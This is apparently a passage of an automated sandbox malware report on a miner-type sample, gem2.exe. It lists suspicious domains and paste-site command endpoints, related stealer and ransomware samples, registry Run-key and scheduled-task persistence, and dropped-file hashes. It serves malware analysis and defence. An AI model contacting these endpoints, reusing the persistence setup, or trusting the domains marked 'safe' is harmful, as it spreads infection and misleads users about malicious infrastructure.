                                          high
                                          https://LearnToCodeWithUs.su/nMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://syncaicloud.com/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://tiffanyonlinestore.top/aMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://contoso.com/Iconpowershell.exe, 0000001F.00000002.1554825743.000002006B931000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://TechVenturesFromRussia.su/GMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://tiffanyonlinestore.top/HWinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://FeelGoodForever.org.ru/FxSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://curl.se/docs/alt-svc.htmlsvchost.exe, svchost.exe, 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpfalse
                                              high
                                              https://adorebeautyz.top/hMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://pastesnap.com/API/cGFzdGVzbmFwEP.phpYg==M.txtsage.cfdapi_key=ut1bkd3rwa55zy8mt1hc&id=21&settsvchost.exe, 00000010.00000002.2554482364.00000173CE0D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 0000001F.00000002.1514433357.000002005BAED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://LearnToCodeWithUs.su/PDATAMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://namesell.sbs/tMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txtsvchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://RussianTechInnovationHub.ru/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://pastesnap.com/API/cGFzdGVzbmFwEP.phpsvchost.exe, 00000010.00000002.2554341140.00000173CE0C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://leadingworld.top/PE=C;LCCWinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpu4csvchost.exe, 00000010.00000002.2554097147.00000173CE06D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2554341140.00000173CE0BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://api.ipify.orgC:curl.exe, 0000003C.00000002.1548361165.0000023245FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://burningspice.cfd/mMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://curl.se/docs/copyright.htmlsvchost.exefalse
                                                    high
                                                    http://www.zlib.net/Dsvchost.exe, 00000010.00000002.2554873475.00000173CF9C7000.00000002.10000000.00040000.00000000.sdmpfalse
                                                      high
                                                      https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60svchost.exe, 00000010.00000002.2554569786.00000173CE0EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2555613530.00000173CFB6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2554482364.00000173CE0D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://bluebullet.su/gMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://pastesnap.com/0xYWMIC.exe, 00000037.00000002.1519599624.000001C183517000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000003.1519154244.000001C183517000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000003.1516325556.000001C183512000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://creativecoder.top/=Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://jobscontext.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://securetextweb.cc/svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, Microsoft-f4855f59e0.exe, 00000011.00000003.1446815949.0000017D99E3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000000.1444761623.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475795269.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000000.1472403011.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525296362.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000000.1536925194.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000003.1538720334.0000015F98C97000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544978601.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://lunarminer.network/svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuebsvchost.exe, 00000010.00000002.2553736925.00000173CE000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://FeelGoodForever.org.ru/NkNMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://RusTechHub.ru/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://gamergategames.top/uxSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://RusTechHub.ru/0WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://curl.se/Vsvchost.exe, 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://leadingworld.top/System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmp, System-f4855f59e0.exe, 0000000E.00000000.1334218488.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp, System-f4855f59e0.exe, 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp, Microsoft-f4855f59e0.exe, Microsoft-f4855f59e0.exe, 00000011.00000003.1446815949.0000017D99E3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000000.1444761623.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475795269.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000000.1472403011.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525296362.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000000.1536925194.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000003.1538720334.0000015F98C97000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544978601.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://syncaicloud.com/ndowsMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60https://pastesnap.com/API/cGFzdGVzbmFsvchost.exe, 00000010.00000002.2554482364.00000173CE0D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://pastesnap.com/KhSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD5989C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.176.186 | textbinvault.com | United States | 13335 | CLOUDFLARENETUS | false
104.21.60.172 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
188.114.97.3 | wavepassage.cfd | European Union | 13335 | CLOUDFLARENETUS | false
142.250.181.228 | www.google.com | United States | 15169 | GOOGLEUS | false
172.67.198.113 | pastesnap.com | United States | 13335 | CLOUDFLARENETUS | false
104.21.64.1 | securetextweb.cc | United States | 13335 | CLOUDFLARENETUS | false
                                                          IP
                                                          127.0.0.1
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1589411
                                                          Start date and time:2025-01-12 09:25:16 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 10m 23s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:59
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:5
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:gem2.exe
                                                          Detection:MAL
                                                          Classification:mal100.evad.mine.winEXE@73/18@7/8
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 90%
                                                          • Number of executed functions: 75
                                                          • Number of non-executed functions: 272
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 40.126.32.140, 40.126.32.76, 20.190.160.17, 40.126.32.74, 20.190.160.22, 40.126.32.136, 20.190.160.14, 40.126.32.68, 13.107.246.45, 20.109.210.53
                                                          • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, ipinfo.io, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                          • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:26:14 | API Interceptor | 32x Sleep call for process: powershell.exe modified
05:14:48 | API Interceptor | 2x Sleep call for process: WMIC.exe modified
05:15:24 | API Interceptor | 183383x Sleep call for process: lsass.exe modified
05:15:24 | API Interceptor | 235257x Sleep call for process: winlogon.exe modified
05:15:26 | API Interceptor | 442x Sleep call for process: svchost.exe modified
05:15:30 | API Interceptor | 200223x Sleep call for process: dwm.exe modified
05:15:33 | API Interceptor | 52x Sleep call for process: WmiPrvSE.exe modified
05:15:38 | API Interceptor | 286x Sleep call for process: dllhost.exe modified
09:26:20 | Task Scheduler | Run new task: System-f4855f59e0 path: C:\Windows\System32\System-f4855f59e0.exe
09:26:23 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft-f4855f59e0 C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe
09:26:31 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft-f4855f59e0 C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.176.186 | INVOICE087667899.exe | malicious | Unknown | heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
104.21.60.172 | http://meta.fanpage-suite-help.live/ | malicious | HTMLPhisher |
104.21.60.172 | https://documentsafedonline365.cloud | malicious | Unknown |
104.26.12.205 | Yoranis Setup.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | RtU8kXPnKr.exe | malicious | Quasar | api.ipify.org/
104.26.12.205 | jgbC220X2U.exe | malicious | Unknown | api.ipify.org/?format=text
104.26.12.205 | xKvkNk9SXR.exe | malicious | TrojanRansom | api.ipify.org/
104.26.12.205 | GD8c7ARn8q.exe | malicious | TrojanRansom | api.ipify.org/
104.26.12.205 | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom | api.ipify.org/
104.26.12.205 | Simple2.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | Ransomware Mallox.exe | malicious | Targeted Ransomware | api.ipify.org/
104.26.12.205 | Yc9hcFC1ux.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | 6706e721f2c06.exe | malicious | Remcos | api.ipify.org/
188.114.97.3 | qbSIgCrCgw.exe | malicious | FormBook | www.zkdamdjj.shop/kf1m/
188.114.97.3 | 8L6MBxaJ2m.exe | malicious | FormBook | www.rtpwslot888gol.sbs/jmkz/
188.114.97.3 | 1SxKeB4u0c.exe | malicious | FormBook | www.rgenerousrs.store/o362/
188.114.97.3 | suBpo1g13Q.exe | malicious | FormBook | www.zkdamdjj.shop/swhs/
188.114.97.3 | k9OEsV37GE.exe | malicious | FormBook | www.einpisalpace.shop/8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF
188.114.97.3 | wWXR5js3k2.exe | malicious | FormBook | www.supernutra01.online/rk61/
188.114.97.3 | NWPZbNcRxL.exe | malicious | FormBook | www.vh5g.sbs/rjsl/
188.114.97.3 | KSts9xW7qy.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
188.114.97.3 | GTA5-elamigos.exe | malicious | Esquele Stealer | /api/get/dll
188.114.97.3 | DHL DOCS 2-0106-25.exe | malicious | FormBook | www.uzshou.world/ricr/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | gem1.exe | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
api.ipify.org | https://pub-ce1f93897bdf44e9b1cd99ad0325c570.r2.dev/index.html | malicious | HTMLPhisher | 172.67.74.152
api.ipify.org | https://support-confirm-help.click/ | malicious | Unknown | 172.67.74.152
api.ipify.org | zmpZMfK1b4.exe | malicious | CredGrabber, Meduza Stealer | 172.67.74.152
api.ipify.org | kAsh3nmsgs.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
api.ipify.org | dhPWt112uC.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | JuIZye2xKX.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | ZeAX5i7cGB.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
api.ipify.org | jKqPSehspS.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | A6AHI7Uk18.exe | malicious | AgentTesla | 172.67.74.152
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | gem1.exe | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
CLOUDFLARENETUS | 176.113.115.170.ps1 | malicious | LummaC | 172.67.160.193
CLOUDFLARENETUS | https://accountsupporthub.es/generate/Login/ | malicious | Unknown | 104.21.90.106
CLOUDFLARENETUS | Solara.exe | malicious | Python Stealer, Exela Stealer, Xmrig | 162.159.134.233
CLOUDFLARENETUS | resembleC2.exe | malicious | Blank Grabber, Umbral Stealer | 162.159.135.232
CLOUDFLARENETUS | Bootstrapper.exe | malicious | LummaC | 172.67.219.181
CLOUDFLARENETUS | http://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/ | malicious | Unknown | 104.21.56.69
CLOUDFLARENETUS | http://www.telegramstg.com/ | malicious | Unknown | 104.21.22.141
CLOUDFLARENETUS | http://www.eovph.icu/ | malicious | Unknown | 104.21.1.232
CLOUDFLARENETUS | http://app-metamask.godaddysites.com/ | malicious | Unknown | 104.17.25.14
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bd0bf25947d4a37404f0424edf4db9ad | 58VSNPxrI4.exe | malicious | Unknown | 104.21.60.172
bd0bf25947d4a37404f0424edf4db9ad | pyld611114.exe | malicious | Unknown | 104.21.60.172
bd0bf25947d4a37404f0424edf4db9ad | dYUteuvmHn.exe | malicious | Unknown | 104.21.60.172
bd0bf25947d4a37404f0424edf4db9ad | SecuriteInfo.com.Win64.Evo-gen.6610.27408.exe | malicious | Unknown | 104.21.60.172
bd0bf25947d4a37404f0424edf4db9ad | SecuriteInfo.com.Win64.Evo-gen.9614.31304.exe | malicious | Unknown | 104.21.60.172
bd0bf25947d4a37404f0424edf4db9ad | SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe | malicious | Unknown | 104.21.60.172
bd0bf25947d4a37404f0424edf4db9ad | app64.exe | malicious | Unknown | 104.21.60.172
bd0bf25947d4a37404f0424edf4db9ad | SecuriteInfo.com.FileRepMalware.12585.5759.exe | malicious | Unknown | 104.21.60.172
bd0bf25947d4a37404f0424edf4db9ad | SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exe | malicious | Unknown | 104.21.60.172
bd0bf25947d4a37404f0424edf4db9ad | SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exe | malicious | Unknown | 104.21.60.172
74954a0c86284d0d6e1c4efefe92b521 | gem1.exe | malicious | Unknown | 104.26.12.205
74954a0c86284d0d6e1c4efefe92b521 | tiko-ifyzit-srdh.vbs | malicious | Unknown | 104.26.12.205
74954a0c86284d0d6e1c4efefe92b521 | Jx6bD8nM4qW9sL3v.exe | malicious | Unknown | 104.26.12.205
74954a0c86284d0d6e1c4efefe92b521 | dsoft.exe | malicious | Python Stealer, Creal Stealer | 104.26.12.205
74954a0c86284d0d6e1c4efefe92b521 | Canvas of Kings_N6xC-S2.exe | malicious | Unknown | 104.26.12.205
74954a0c86284d0d6e1c4efefe92b521 | Violated Heroine_91zbZ-1.exe | malicious | Unknown | 104.26.12.205
74954a0c86284d0d6e1c4efefe92b521 | 58VSNPxrI4.exe | malicious | Unknown | 104.26.12.205
74954a0c86284d0d6e1c4efefe92b521 | 676556be12ac3.vbs | malicious | Mint Stealer | 104.26.12.205
74954a0c86284d0d6e1c4efefe92b521 | PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta | malicious | Mint Stealer | 104.26.12.205
74954a0c86284d0d6e1c4efefe92b521 | 9KEZfGRjyK.exe | malicious | Unknown | 104.26.12.205
37f463bf4616ecd445d4a1937da06e19 | gem1.exe | malicious | CredGrabber, Meduza Stealer | 104.21.60.172
37f463bf4616ecd445d4a1937da06e19 | 1387457-38765948.15.exe | malicious | Nitol | 104.21.60.172
37f463bf4616ecd445d4a1937da06e19 | 1387457-38765948.15.exe | malicious | Unknown | 104.21.60.172
37f463bf4616ecd445d4a1937da06e19 | build.exe | malicious | Vidar | 104.21.60.172
37f463bf4616ecd445d4a1937da06e19 | zmpZMfK1b4.exe | malicious | CredGrabber, Meduza Stealer | 104.21.60.172
37f463bf4616ecd445d4a1937da06e19 | ix8kxoBHDb.exe | malicious | Remcos, GuLoader | 104.21.60.172
37f463bf4616ecd445d4a1937da06e19 | b0cQukXPAl.exe | malicious | LummaC | 104.21.60.172
37f463bf4616ecd445d4a1937da06e19 | c7WJL1gt32.exe | malicious | GuLoader, MassLogger RAT | 104.21.60.172
37f463bf4616ecd445d4a1937da06e19 | ZaRP7yvL1J.exe | malicious | MassLogger RAT | 104.21.60.172
37f463bf4616ecd445d4a1937da06e19 | grrezORe7h.exe | malicious | GuLoader, MassLogger RAT | 104.21.60.172
                                                              No context
                                                              Process:C:\Users\user\Desktop\gem2.exe
                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):538624
                                                              Entropy (8bit):6.311350325901448
                                                              Encrypted:false
                                                              SSDEEP:6144:9m2AOgAgbVYlfxTtR9HVOPeTEKybk5e6XJugmE8fpNj8Osc11gPbuAvZmeGzpwG:9mLOplfLHVOPeYceXE8Dx1gPbVv
                                                              MD5:BE89D598CD96443479C02B022FF70532
                                                              SHA1:F0AB69F56EBBBDDA791D61FD3D22476D61135871
                                                              SHA-256:A4C4487DCACEBF5048B2266233F5645CFE421154F26E6685CED36AA0621037F1
                                                              SHA-512:36E7CF511786D417F5033B7F743211CEF995A6203C4E6DB22334F7721355A90AC4E21A118C67E3752B7BDEF82FCCB74BB978DC30D0E7BFCD69D14855DBE6D3AB
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                              Process:C:\Users\user\Desktop\gem2.exe
                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):7071064
                                                              Entropy (8bit):5.999924958826124
                                                              Encrypted:false
                                                              SSDEEP:49152:v/KrwoCmD+esMkK5xDyB6vZT9xitPA7McncoinywDBwLky1SQr/N6aAIp8Sp38mH:i
                                                              MD5:7425A9D8FC994FB813CFB3115BB78E14
                                                              SHA1:DA632D13A0BBB4577AB0278BC99AF81299A64568
                                                              SHA-256:A79B9BE919E6F28D438F238CCD973B13F26B9368E196A674A84E1D23E56D19E5
                                                              SHA-512:1E1C29AF1600F5CFE4F180151274B10C0AC373A57D9E11A56E174C66EBF6BF35E67FBFB77B0F00537B846C65E1CD05B56836F50471EDE8140CF3FF4F947258B5
                                                              Malicious:false
                                                              Process:C:\Users\user\Desktop\gem2.exe
                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):222552
                                                              Entropy (8bit):5.990333251377902
                                                              Encrypted:false
                                                              SSDEEP:6144:qXsTRWRdYXqufqspfNgCJgtHjo2+mPrr2NhqE2:qXsdymq4ng9o2vPrr2nW
                                                              MD5:D15D21A47114E13D0ECD695F9CC7752B
                                                              SHA1:DAD45A62DE5AC90C668D47ECC9B3D633E8DB123D
                                                              SHA-256:61DA3F2353E4F178DF52F82FCE50BC9A42FFC3B874D5983C84F60987162B8AC3
                                                              SHA-512:8307990631AF0C14558C806172C79E1B0108AB99C65FC8F990D111A17B56F289855BD50AC54D0486650727E6B289B7561C7A8F612B75C359774E30D9C8DC59B3
                                                              Malicious:false
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllultnxj:NllU
                                                              MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                              SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                              SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                              SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                              Malicious:false
                                                              Preview:@...e................................................@..........
                                                              Process:C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe
                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Category:modified
                                                              Size (bytes):538624
                                                              Entropy (8bit):6.311350325901448
                                                              Encrypted:false
                                                              SSDEEP:6144:9m2AOgAgbVYlfxTtR9HVOPeTEKybk5e6XJugmE8fpNj8Osc11gPbuAvZmeGzpwG:9mLOplfLHVOPeYceXE8Dx1gPbVv
                                                              MD5:BE89D598CD96443479C02B022FF70532
                                                              SHA1:F0AB69F56EBBBDDA791D61FD3D22476D61135871
                                                              SHA-256:A4C4487DCACEBF5048B2266233F5645CFE421154F26E6685CED36AA0621037F1
